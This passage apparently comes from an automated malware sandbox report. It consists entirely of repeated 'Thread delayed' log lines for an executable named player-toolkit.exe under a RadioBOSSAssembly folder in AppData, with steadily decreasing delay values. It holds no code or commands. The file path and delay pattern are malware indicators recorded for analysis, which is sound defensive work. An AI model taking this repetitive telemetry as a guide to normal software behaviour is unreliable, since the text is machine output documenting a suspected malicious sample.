Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 35111
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 35001
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 34891
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 34783
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 34672
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 34563
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 34454
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 34345
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 34235
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 34126
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 34017
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 33907
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 33798
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 33689
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 33579
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 33470
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 33361
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 33207
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 33095
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 32986
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 32876
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 32767
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 32658
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 32548
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 32439
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 32329
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 32220
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 32111
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 32001
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 31891
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 31782
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 31673
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 31564
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 31454
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 31345
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 31235
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 31126
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 31016
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 30907
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 30798
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 30685
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 30579
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 30470
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 30361
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 30251
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 30142
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 30033
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59897
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59788
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59679
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59565
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59404
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59303
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59193
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59084
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58970
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58864
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58756
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58390
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58288
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58177
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58049
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57867
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56974
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56866
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56741
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56632
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56522
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56413
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56304
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56193
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56085
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55975
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55866
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55757
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55647
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55538
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55427
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55319
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55210
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55100
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54987
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54880
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54772
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54663
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54554
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54444
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54334
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54226
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54116
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54006
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53897
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53788
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53679
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53569
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53459
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53350
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53241
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53131
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53022
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52912
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52804
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52693
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52584
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52475
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52366
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52257
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52147
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52038
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51929
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51819
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51710
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51600
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51491
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51382
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51272
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51163
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51054
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50944
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50835
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50725
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50616
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50506
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50397
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50288
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50178
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50069
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49960
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49850
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49740
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49631
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49522
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49413
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49303
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49194
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49085
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48975
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48866
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48757
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48647
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48538
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48429
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48319
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48208
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48100
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47991
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47881
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47772
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47663
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47553
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47444
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47335
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47224
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47116
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47006
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46897
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46788
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46678
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46569
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46460
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46350
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46241
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46132
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46022
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45913
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45804
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45694
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45585
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45474
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45366
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45256
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45147
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45038
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44928
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44819
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44710
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44600
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44491
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44382
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44272
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44163
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44053
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43943
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43835
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43725
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43616
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43507
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43397
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43288
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43179
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43069
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42960
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42851
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42741
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42632
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42522
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42413
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42303
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42194
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42085
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41975
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41866
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41757
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41647
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41538
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41279
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41178
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41069
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40960
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40850
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40741
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40632
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40248
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40101
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39991
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39854
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39716
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39172
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39068
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38958
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38851
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38741
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38632
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38522
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38412
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38303
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38194
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38084
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37975
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37866
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37756
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37647
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37538
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37428
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37319
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37210
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37100
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36991
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36882
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36772
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36663
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36554
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59886
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59776
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59666
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59558
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59448
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59339
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59120
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59010
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58900
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58792
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58683
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58573
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58464
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58353
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58245
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58136
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58026
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57917
